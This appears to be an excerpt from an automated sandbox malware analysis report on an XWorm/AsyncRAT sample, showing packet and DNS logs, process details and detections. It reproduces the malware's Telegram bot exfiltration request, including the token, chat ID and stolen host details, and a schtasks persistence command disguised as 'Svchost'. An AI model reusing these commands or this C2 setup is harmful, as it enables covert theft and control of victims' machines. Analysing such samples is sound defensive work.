                                                                                                                                                                              Feb 6, 2024 09:37:21.580009937 CET4982822100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:37:21.765875101 CET2210049828167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:37:21.769896984 CET4982822100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:37:21.783972979 CET2210049828167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:37:21.973740101 CET2210049828167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:37:21.995743036 CET4982922100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:37:22.205903053 CET2210049829167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:37:22.205990076 CET4982922100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:37:22.261054039 CET4982922100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:37:22.416117907 CET2210049829167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:37:22.417767048 CET4982922100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:37:22.459747076 CET4982922100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:37:22.463155985 CET4983022100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:37:22.470839977 CET2210049829167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:37:22.627989054 CET2210049829167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:37:22.669579029 CET2210049829167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:37:22.677949905 CET2210049830167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:37:22.678167105 CET4983022100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:37:22.697542906 CET4983022100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:37:22.893831968 CET2210049830167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:37:22.894048929 CET4983022100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:37:22.912261963 CET2210049830167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:37:23.037307978 CET4983022100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:37:23.042855024 CET4983122100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:37:23.108882904 CET2210049830167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:37:23.252095938 CET2210049830167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:37:23.259212017 CET2210049831167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:37:23.259319067 CET4983122100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:37:23.312845945 CET4983122100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:37:23.475775957 CET2210049831167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:37:23.475876093 CET4983122100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:37:23.529453993 CET2210049831167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:37:23.531797886 CET4983122100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:37:23.538635015 CET4983222100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:37:23.692116022 CET2210049831167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:37:23.741902113 CET2210049832167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:37:23.743838072 CET4983222100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:37:23.748409033 CET2210049831167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:37:23.786571980 CET4983222100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:37:23.947185993 CET2210049832167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:37:23.947273016 CET4983222100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:37:23.963238001 CET4983222100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:37:23.968255997 CET4983322100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:37:23.989578009 CET2210049832167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:37:24.150201082 CET2210049832167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:37:24.166265011 CET2210049832167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:37:24.175276041 CET2210049833167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:37:24.175857067 CET4983322100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:37:24.210484028 CET4983322100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:37:24.384871006 CET2210049833167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:37:24.384943008 CET4983322100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:37:24.417543888 CET2210049833167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:37:24.443880081 CET4983322100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:37:24.447432041 CET4983422100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:37:24.591826916 CET2210049833167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:37:24.650764942 CET2210049833167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:37:24.656954050 CET2210049834167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:37:24.657099962 CET4983422100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:37:24.682818890 CET4983422100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:37:24.866605043 CET2210049834167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:37:24.869786978 CET4983422100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:37:24.879264116 CET4983422100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:37:24.892127037 CET2210049834167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:37:25.048413992 CET4983522100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:37:25.079091072 CET2210049834167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:37:25.088491917 CET2210049834167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:37:25.265261889 CET2210049835167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:37:25.265347958 CET4983522100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:37:25.289880037 CET4983522100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:37:25.482198000 CET2210049835167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:37:25.482460022 CET4983522100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:37:25.506194115 CET4983522100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:37:25.506505966 CET2210049835167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:37:25.510593891 CET4983622100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:37:25.700480938 CET2210049835167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:37:25.720730066 CET2210049836167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:37:25.720829010 CET4983622100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:37:25.723718882 CET2210049835167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:37:25.741355896 CET4983622100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:37:25.930568933 CET2210049836167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:37:25.930634022 CET4983622100192.168.2.9167.71.56.116
                                                                                                                                                                              Feb 6, 2024 09:37:25.950835943 CET2210049836167.71.56.116192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:37:26.140152931 CET2210049836167.71.56.116192.168.2.9
                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                              Feb 6, 2024 09:33:26.793662071 CET5440953192.168.2.91.1.1.1
                                                                                                                                                                              Feb 6, 2024 09:33:26.911106110 CET53544091.1.1.1192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:33:27.982332945 CET5760353192.168.2.91.1.1.1
                                                                                                                                                                              Feb 6, 2024 09:33:28.158396959 CET53576031.1.1.1192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:08.804172993 CET5293853192.168.2.91.1.1.1
                                                                                                                                                                              Feb 6, 2024 09:34:08.985332966 CET53529381.1.1.1192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:34:41.040900946 CET5340553192.168.2.91.1.1.1
                                                                                                                                                                              Feb 6, 2024 09:34:41.220263004 CET53534051.1.1.1192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:35:11.273876905 CET5539353192.168.2.91.1.1.1
                                                                                                                                                                              Feb 6, 2024 09:35:11.432729006 CET53553931.1.1.1192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:36:06.174799919 CET6524253192.168.2.91.1.1.1
                                                                                                                                                                              Feb 6, 2024 09:36:06.292565107 CET53652421.1.1.1192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:36:11.480329037 CET6472953192.168.2.91.1.1.1
                                                                                                                                                                              Feb 6, 2024 09:36:11.867438078 CET53647291.1.1.1192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:36:35.960139990 CET6476653192.168.2.91.1.1.1
                                                                                                                                                                              Feb 6, 2024 09:36:36.116210938 CET53647661.1.1.1192.168.2.9
                                                                                                                                                                              Feb 6, 2024 09:37:24.884151936 CET6045253192.168.2.91.1.1.1
                                                                                                                                                                              Feb 6, 2024 09:37:25.042890072 CET53604521.1.1.1192.168.2.9
                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                              Feb 6, 2024 09:33:26.793662071 CET192.168.2.91.1.1.10x41bbStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Feb 6, 2024 09:33:27.982332945 CET192.168.2.91.1.1.10xf2baStandard query (0)trusting-smoke-90361.pktriot.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Feb 6, 2024 09:34:08.804172993 CET192.168.2.91.1.1.10xccf0Standard query (0)trusting-smoke-90361.pktriot.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Feb 6, 2024 09:34:41.040900946 CET192.168.2.91.1.1.10xa3d0Standard query (0)trusting-smoke-90361.pktriot.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Feb 6, 2024 09:35:11.273876905 CET192.168.2.91.1.1.10x32e9Standard query (0)trusting-smoke-90361.pktriot.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Feb 6, 2024 09:36:06.174799919 CET192.168.2.91.1.1.10xc776Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Feb 6, 2024 09:36:11.480329037 CET192.168.2.91.1.1.10x60fbStandard query (0)trusting-smoke-90361.pktriot.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Feb 6, 2024 09:36:35.960139990 CET192.168.2.91.1.1.10x8fbeStandard query (0)trusting-smoke-90361.pktriot.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Feb 6, 2024 09:37:24.884151936 CET192.168.2.91.1.1.10x6556Standard query (0)trusting-smoke-90361.pktriot.netA (IP address)IN (0x0001)false
                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                              Feb 6, 2024 09:33:26.911106110 CET1.1.1.1192.168.2.90x41bbNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                                              Feb 6, 2024 09:33:28.158396959 CET1.1.1.1192.168.2.90xf2baNo error (0)trusting-smoke-90361.pktriot.neteu-central-7075.packetriot.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Feb 6, 2024 09:33:28.158396959 CET1.1.1.1192.168.2.90xf2baNo error (0)eu-central-7075.packetriot.net167.71.56.116A (IP address)IN (0x0001)false
                                                                                                                                                                              Feb 6, 2024 09:34:08.985332966 CET1.1.1.1192.168.2.90xccf0No error (0)trusting-smoke-90361.pktriot.neteu-central-7075.packetriot.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Feb 6, 2024 09:34:08.985332966 CET1.1.1.1192.168.2.90xccf0No error (0)eu-central-7075.packetriot.net167.71.56.116A (IP address)IN (0x0001)false
                                                                                                                                                                              Feb 6, 2024 09:34:41.220263004 CET1.1.1.1192.168.2.90xa3d0No error (0)trusting-smoke-90361.pktriot.neteu-central-7075.packetriot.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Feb 6, 2024 09:34:41.220263004 CET1.1.1.1192.168.2.90xa3d0No error (0)eu-central-7075.packetriot.net167.71.56.116A (IP address)IN (0x0001)false
                                                                                                                                                                              Feb 6, 2024 09:35:11.432729006 CET1.1.1.1192.168.2.90x32e9No error (0)trusting-smoke-90361.pktriot.neteu-central-7075.packetriot.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Feb 6, 2024 09:35:11.432729006 CET1.1.1.1192.168.2.90x32e9No error (0)eu-central-7075.packetriot.net167.71.56.116A (IP address)IN (0x0001)false
                                                                                                                                                                              Feb 6, 2024 09:36:06.292565107 CET1.1.1.1192.168.2.90xc776No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                                              Feb 6, 2024 09:36:11.867438078 CET1.1.1.1192.168.2.90x60fbNo error (0)trusting-smoke-90361.pktriot.neteu-central-7075.packetriot.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Feb 6, 2024 09:36:11.867438078 CET1.1.1.1192.168.2.90x60fbNo error (0)eu-central-7075.packetriot.net167.71.56.116A (IP address)IN (0x0001)false
                                                                                                                                                                              Feb 6, 2024 09:36:36.116210938 CET1.1.1.1192.168.2.90x8fbeNo error (0)trusting-smoke-90361.pktriot.neteu-central-7075.packetriot.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Feb 6, 2024 09:36:36.116210938 CET1.1.1.1192.168.2.90x8fbeNo error (0)eu-central-7075.packetriot.net167.71.56.116A (IP address)IN (0x0001)false
                                                                                                                                                                              Feb 6, 2024 09:37:25.042890072 CET1.1.1.1192.168.2.90x6556No error (0)trusting-smoke-90361.pktriot.neteu-central-7075.packetriot.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Feb 6, 2024 09:37:25.042890072 CET1.1.1.1192.168.2.90x6556No error (0)eu-central-7075.packetriot.net167.71.56.116A (IP address)IN (0x0001)false
                                                                                                                                                                              • api.telegram.org
                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              0192.168.2.949705149.154.167.2204433280C:\Users\user\AppData\Roaming\X.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-02-06 08:33:27 UTC447OUTGET /bot6731733957:AAGWQfODbJKr7tNuz5LDiFk41dKVxsOuAEA/sendMessage?chat_id=2031060627&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A99B59929CF3A7C56FB7E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20_68WOMU2%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1
                                                                                                                                                                              Host: api.telegram.org
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              2024-02-06 08:33:27 UTC388INHTTP/1.1 200 OK
                                                                                                                                                                              Server: nginx/1.18.0
                                                                                                                                                                              Date: Tue, 06 Feb 2024 08:33:27 GMT
                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                              Content-Length: 452
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                              2024-02-06 08:33:27 UTC452INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 31 33 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 33 31 37 33 33 39 35 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 69 20 72 65 61 6c 6c 79 20 68 61 74 65 20 74 68 69 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 69 72 65 61 6c 6c 79 68 61 74 65 74 68 69 73 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 33 31 30 36 30 36 32 37 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 75 6b 6b 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 75 6b 6b 79 30 35 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 30 37 32 30 38 34 30 37 2c 22 74 65 78 74 22 3a 22
                                                                                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":3131,"from":{"id":6731733957,"is_bot":true,"first_name":"i really hate this","username":"ireallyhatethisbot"},"chat":{"id":2031060627,"first_name":"Lukky","username":"Lukky053","type":"private"},"date":1707208407,"text":"


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              1192.168.2.949784149.154.167.220443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-02-06 08:36:06 UTC447OUTGET /bot6731733957:AAGWQfODbJKr7tNuz5LDiFk41dKVxsOuAEA/sendMessage?chat_id=2031060627&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A99B59929CF3A7C56FB7E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20_68WOMU2%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1
                                                                                                                                                                              Host: api.telegram.org
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              2024-02-06 08:36:07 UTC388INHTTP/1.1 200 OK
                                                                                                                                                                              Server: nginx/1.18.0
                                                                                                                                                                              Date: Tue, 06 Feb 2024 08:36:07 GMT
                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                              Content-Length: 452
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                              2024-02-06 08:36:07 UTC452INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 31 33 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 33 31 37 33 33 39 35 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 69 20 72 65 61 6c 6c 79 20 68 61 74 65 20 74 68 69 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 69 72 65 61 6c 6c 79 68 61 74 65 74 68 69 73 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 33 31 30 36 30 36 32 37 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 75 6b 6b 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 75 6b 6b 79 30 35 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 30 37 32 30 38 35 36 37 2c 22 74 65 78 74 22 3a 22
                                                                                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":3134,"from":{"id":6731733957,"is_bot":true,"first_name":"i really hate this","username":"ireallyhatethisbot"},"chat":{"id":2031060627,"first_name":"Lukky","username":"Lukky053","type":"private"},"date":1707208567,"text":"


                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              Target ID:0
                                                                                                                                                                              Start time:09:33:19
                                                                                                                                                                              Start date:06/02/2024
                                                                                                                                                                              Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe
                                                                                                                                                                              Imagebase:0x7f0000
                                                                                                                                                                              File size:2'324'480 bytes
                                                                                                                                                                              MD5 hash:8DCBB40394210DC5287028E66FDBF0C7
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1426417330.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1426417330.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:2
                                                                                                                                                                              Start time:09:33:20
                                                                                                                                                                              Start date:06/02/2024
                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\X.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\X.exe"
                                                                                                                                                                              Imagebase:0x960000
                                                                                                                                                                              File size:36'864 bytes
                                                                                                                                                                              MD5 hash:F57EC853B0F01B0E9954CFBF8FEEB081
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000000.1420642813.0000000000962000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000000.1420642813.0000000000962000.00000002.00000001.01000000.00000006.sdmp, Author: ditekSHen
                                                                                                                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\X.exe, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\X.exe, Author: Joe Security
                                                                                                                                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\X.exe, Author: ditekSHen
                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                              • Detection: 82%, ReversingLabs
                                                                                                                                                                              • Detection: 77%, Virustotal, Browse
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:3
                                                                                                                                                                              Start time:09:33:20
                                                                                                                                                                              Start date:06/02/2024
                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\61c7cdb3196df.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\61c7cdb3196df.exe"
                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                              File size:1'907'200 bytes
                                                                                                                                                                              MD5 hash:C0E5B07CBF2D02C54F39CE6AAD676DC7
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:Borland Delphi
                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                              • Detection: 11%, ReversingLabs
                                                                                                                                                                              • Detection: 10%, Virustotal, Browse
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:4
                                                                                                                                                                              Start time:09:33:24
                                                                                                                                                                              Start date:06/02/2024
                                                                                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svchost" /tr "C:\Users\user\AppData\Local\Temp\Svchost.exe
                                                                                                                                                                              Imagebase:0x7ff6c27f0000
                                                                                                                                                                              File size:235'008 bytes
                                                                                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:5
                                                                                                                                                                              Start time:09:33:24
                                                                                                                                                                              Start date:06/02/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:16
                                                                                                                                                                              Start time:09:35:34
                                                                                                                                                                              Start date:06/02/2024
                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                              Imagebase:0x7ff77afe0000
                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:17
                                                                                                                                                                              Start time:09:35:35
                                                                                                                                                                              Start date:06/02/2024
                                                                                                                                                                              Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\WerFault.exe -pss -s 440 -p 3280 -ip 3280
                                                                                                                                                                              Imagebase:0x7ff6d9200000
                                                                                                                                                                              File size:570'736 bytes
                                                                                                                                                                              MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:18
                                                                                                                                                                              Start time:09:35:35
                                                                                                                                                                              Start date:06/02/2024
                                                                                                                                                                              Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\WerFault.exe -u -p 3280 -s 1732
                                                                                                                                                                              Imagebase:0x7ff6d9200000
                                                                                                                                                                              File size:570'736 bytes
                                                                                                                                                                              MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:19
                                                                                                                                                                              Start time:09:35:38
                                                                                                                                                                              Start date:06/02/2024
                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                              Imagebase:0x7ff77afe0000
